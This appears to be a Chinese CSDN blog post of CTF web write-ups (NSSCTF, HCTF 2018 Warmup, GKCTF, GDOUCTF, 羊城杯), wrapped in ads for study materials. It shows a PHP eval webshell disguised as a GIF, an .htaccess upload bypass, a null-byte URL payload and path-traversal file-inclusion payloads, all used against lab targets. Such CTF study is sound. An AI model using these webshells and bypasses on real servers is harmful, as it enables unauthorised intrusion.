NSSCTF之Web篇刷题记录(13)_nssctfeasyuoload

于 2024-05-17 02:59:31 发布
阅读量960 收藏 29
点赞数 23
分类专栏: 2024年程序员学习 文章标签: 网络安全 web安全 面试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_84520457/article/details/138983995
版权

还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!

王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。

对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!

【完整版领取方式在文末!!】

93道网络安全面试题

需要体系化学习资料的朋友,可以加我V获取:vip204888 (备注网络安全)

内容实在太多,不一一截图了

黑客学习资源推荐

最后给大家分享一份全套的网络安全学习资料,给那些想学习 网络安全的小伙伴们一点帮助!

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

1️⃣零基础入门
① 学习路线

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

image

② 路线对应学习视频

同时每个成长路线对应的板块都有配套的视频提供:

image-20231025112050764

网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。

需要这份系统化资料的朋友,可以点击这里获取

一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!

先传了一个一句话木马然后过滤了上传一个.htaccess文件 AddType application/x-httpd-php .jpeg(将.jpeg文件解析为php文件)

在这里插入图片描述

在这里插入图片描述
这里我们可以解析jpeg后 继续上传一个一句话木马的jpeg 但是 这里还有过滤(诶,别蒙我啊,这标志明显还是php啊)修改为:

GIF89a  
<script language="php">eval($_POST['cmd']);</script>

在这里插入图片描述

然后蚁🗡连接在根目录下看到flag

在这里插入图片描述

在这里插入图片描述

NSSCTF{13452adb-4b78-4942-bdea-9f90c17d4507}

[GKCTF 2020]cve版签到:

在这里插入图片描述
PHP 7.2.29之前的7.2.x版本、7.3.16之前的7.3.x版本和7.4.4之前的7.4.x版本中的get_headers()函数存在安全漏洞(\0可以截断)。攻击者可利用该漏洞造成信息泄露

使用%00截断 说我们url请求必须包含.ctfhub.com F12 提示flag在本地,还告诉了我们主机名必须以123结尾

在这里插入图片描述
Payload:?url=http://127.0.0.123%00www.ctfhub.com

在这里插入图片描述

NSSCTF{80f1e680-dcd3-407f-b001-fe43442fed83}

[HCTF 2018]Warmup:

在这里插入图片描述
在这里插入图片描述

<?php
    highlight\_file(\_\_FILE\_\_);
    class emmm
    {
        public static function checkFile(&$page)
        {
            $whitelist = ["source"=>"source.php","hint"=>"hint.php"];
            if (! isset($page) || !is\_string($page)) {
                echo "you can't see it";
                return false;
            }

            if (in\_array($page, $whitelist)) {
                return true;
            }

            $\_page = mb\_substr(
                $page,
                0,
                mb\_strpos($page . '?', '?')
            );
            if (in\_array($\_page, $whitelist)) {
                return true;
            }

            $\_page = urldecode($page);
            $\_page = mb\_substr(
                $\_page,
                0,
                mb\_strpos($\_page . '?', '?')
            );
            if (in\_array($\_page, $whitelist)) {
                return true;
            }
            echo "you can't see it";
            return false;
        }
    }

    if (! empty($\_REQUEST['file'])
        && is\_string($\_REQUEST['file'])
        && emmm::checkFile($\_REQUEST['file'])
    ) {
        include $\_REQUEST['file'];
        exit;
    } else {
        echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
    }  
?>

文件包含 Payload:file=hint.php?../../../../../ffffllllaaaagggg

在这里插入图片描述
在这里插入图片描述

NSSCTF{c5a0500a-bc52-40e2-b4e4-6155dc4ba55e}

[GDOUCTF 2023]泄露的伪装:

使用dirsearch 扫到了www.rar 打开文档有个路径 进行访问 然后就是代码审计

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

文件包含 根据代码审计以及file_get_contents读取文件内容函数我们可以知道我们需要传入一个文件,这里可以利用data://伪协议

Pyload:orzorz.php?cxk=data://text/plain,ctrl

在这里插入图片描述

NSSCTF{33af9a1f-f959-4d87-bdd0-e82ed1087876}

[羊城杯 2020]easycon:

一个Ubuntu默认页面访问index.php,提示eval post cmd应该是有一句话
直接蚁剑连接 🆗成功连接 发现bbbbbbbbb.txtBase64转图片

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

Base64转图片:https://tool.jisuapi.com/base642pic.html

在这里插入图片描述

网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。

需要体系化学习资料的朋友,可以加我V获取:vip204888 (备注网络安全)

需要这份系统化资料的朋友,可以点击这里获取

一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!

2401_84520457
关注
  • 23
    点赞
  • 29
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
nssctf文件test
03-30
1
[SWPUCTF 2021 新生赛]traditional
03-15
在 SWPUCTF 2021 新生赛的传统目中,我们看到了一道有趣的密码目,它与八卦图和二进制数学有着紧密的联系。莱布尼茨是西方的二进制数学的发明者,他受到中国的八卦图的启发,演绎并推论出了数学矩阵,最后创造...
[NSSCTF]-Web:[SWPUCTF 2021 新生赛]easy_sql解析
2301_79326813的博客
02-10 871
注意,这里需要把wllm设置为不为1的数(就是让他查不到数据就行,因为wllm=1查得到数据),不然它只会输出wllm=1查询到的数据。得到数据库名称就可以按顺序数据库-表-列来找flag了。有提示,参数是wllm,并且要我们输入点东西。从上图看应该是字符型漏洞,单引号字符注入。所以,我们尝试以get方式传入。报错了,说明字段数是3。有回显,但似乎没啥用。
[GDOUCTF 2023] 部分web
qq_44640313的博客
04-18 1474
GDOUCTF 2023,主要见识了fenjing的使用
NSSCTF之Misc篇记录
Aluxian_的博客
05-11 1455
[CISCN 2022 初赛]ez_usb [SWPUCTF 2021 新生赛]你喜欢osu吗? [SWPUCTF 2021 新生赛]Bill [SWPUCTF 2021 新生赛]二维码不止有二维码 [HGAME 2022 week1]好康的流量 [红明谷CTF 2022]MissingFile [广东省大学生攻防大赛 2021]这是道签到 [羊城杯 2022]签个到
[GXYCTF2019]BabyUpload1 -- 目分析与详解
最新发布
2302_79800344的博客
03-03 1252
代码中并没有写传统的一句话木马,因为直接写一句话木马需要关闭系统防火墙。.htaccess 文件。
[HNCTF 2022 Week1]easy_upload
2302_81393479的博客
02-15 383
现在就用burpsuite抓包,然后上传木马。在filename里输入木马文件的文件名(命名随意)然后在下面上传一句话木马:<?> 所以这里就是用post接收oo这个变量。然后可以在右侧看到文件上传成功的路径:/upload/00.php。/upload/00.php,密码就是输入我们刚才用post接收的变量oo,然后点击添加。添加成功后就进入查看文件目录,然后找flag文件,点击查看。进来看到目叫我们上传文件,所以可知我们可以上传一句话木马文件。
apachecn#apachecn-ctf-wiki#CTF-AWD靶场搭建和第一解_星星明亮的博客-CSDN博客_awd靶
07-25
1.根据当前队伍数量copy所有的队伍的比赛文件夹: 2.启动比赛: 1.每个队伍分配到一个docker主机,给定ctf用户权限,通过制定的端口和密码进行连接
vm虚拟机-简单目(hgame-week4-easyvm、cg-ctf wxyVM1/2
01-08
vm 比较经典的虚拟机的目是南邮的cg-ctf的目, 然后先写了前面的cg-ctf的两个目,其实当时做的时候还没太大虚拟机的感觉,后面接触到hgame的目,然后再看的时候就感觉到有些那个意思,但是两个目是基础...
[GDOUCTF 2023]泄露的伪装
2301_80189829的博客
12-13 346
看到目提示为php协议,进行目录扫描得到一个test.txt页面打开来。和一个orzorz.php页面。直接用Hackbar传参。
HNCTF 2022 week1 web方向
m0_74160536的博客
08-01 639
简单说一下file伪协议,也是引用的别人博客(https://blog.csdn.net/qq_37466661/article/details/126203437)但正常情况下,我们输入php?filter=flag.php,只会发现一片空白,这时就需要用到php伪协议了,而这道使用的就是file伪协议。检查-网络-新网页,只有两个网络响应,不过另一个是图标,不用管,打开cookie,提示去/f14g.php,跳转。打开环境,是一个小游戏,目标是2000分,不用管,小游戏基本都是找js代码。
[GXYCTF2019]BabyUpload
个人笔记
04-05 605
注意:这里的.htaccess就是文件名,绕过更改文件类似在burp中更改绕过,不要写成.htaccess.jpg文件名,它不会被识别未配置文件。->两者都做了检测,尝试绕过->上传成功无法被解析->考虑解析漏洞,上传配置文件->解析成功。3,怀疑对php标签内容检测,如?思路:考虑.htaccess和.user.ini配置文件控制,实现解析漏洞。分析:文件上传成功了,但是jpg文件无法被当成php解析。分析:验证了对文件名后缀检测,同时可能存在对内容检测。2,尝试上传其它类型的文件。
[HFCTF2020]BabyUpload
nigo134的博客
06-04 961
通过上传session文件伪造session。
NSS [HNCTF 2022 Week1]Interesting_http
Jay17的博客
09-21 347
NSS [HNCTF 2022 Week1]Interesting_http
[GDOUCTF 2023] ——web方向全Write up
Leaf_initial的博客
04-17 2080
魔术方法,然后可以看到__wakeup()中会指向classroom类的hahaha函数,hahaha所需要的变量条件在school类的。把`’ [] " _ {{}} \ .都过滤了但是比较幸运的是可以用{%%},看了看他的config和self,发现都可以用。test.txt也看过了,里面和/orzorz.php中的内容一样,不过是文档形式,这里不赘述。可以看出这个通过flask框架写的一个网页,通过代码审计我们可以得知,只需要向。所以,双等号是不要求类型相同的,所以我们可以构造payload。
BUUCTF-[GXYCTF2019]BabyUpload
qq_43006864的博客
05-06 1158
直接开。 上来就是一个文件上传。 这里随便传了几个文件测试,发现只能传入jpeg格式的文件。对文件名和文件类型都做了限制。 所以这里想到了之前用过了.htaccess。 传入.htaccess,格式修改为image/jpeg。 上传成功, 传入php探针进行测试,这里推荐直接上phtml格式的马子。 传入php探针,并执行成功,看来是没问的。这里路径大家参考这个: http://84247058-8c5c-496d-b573-d01266658f00.node4.b...
2022HNCTF-web
bossDDYY的博客
10-30 3155
应该和http协议有关 想要什么 肯定flag说我们不是admin 看看cookie修改cookie继续修改 x-forwarded-for [Week1]2048 分析 目描述你能达到20000分吗?应该是要求我们玩到20000分F12查看脚本直接输入在控制台输入 [Week1]easy_html 分析 输入框限制了11位 f12修改html属性 或者直接post参数 [Week1]Interesting_include 分析 目描述:web手要懂得搜索 应该要借助浏览器一眼伪协议base64解码 [
文件上传漏洞
m0_70683009的博客
05-21 1148
如果对方中间件是apache属于低版本,我们可以利用文件上传,上传一个不识别的文件后缀,利用解析漏洞规则成功解析文件,其中的后门代码被执行。,可以被当作php文件进行解析,从最后一个.mmm开始,apache不认识,就往前走,一直到.php,这样即绕过了验证,有可以进行解析。⑤:不删除末尾的点,在后缀名加点(需要在抓到的数据包中加点,直接在文件后缀名加点会命名不成功,它会自动删除点)(2) 当上传文件.asp;上传可以上传的文件,在文件地址后加上/x.php,可以让文件以php代码去执行。
nssctf的jwt问3
08-17
3. 请确保您已经导入 `java.awt.image抱歉,我无法回答有关 nssctf 的问。我是一个与开发者有关的 AI,.BufferedImage` 和 `javax.imageio.ImageIO` 类。 您可以根据需要修改保存图片的路径和文件名。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值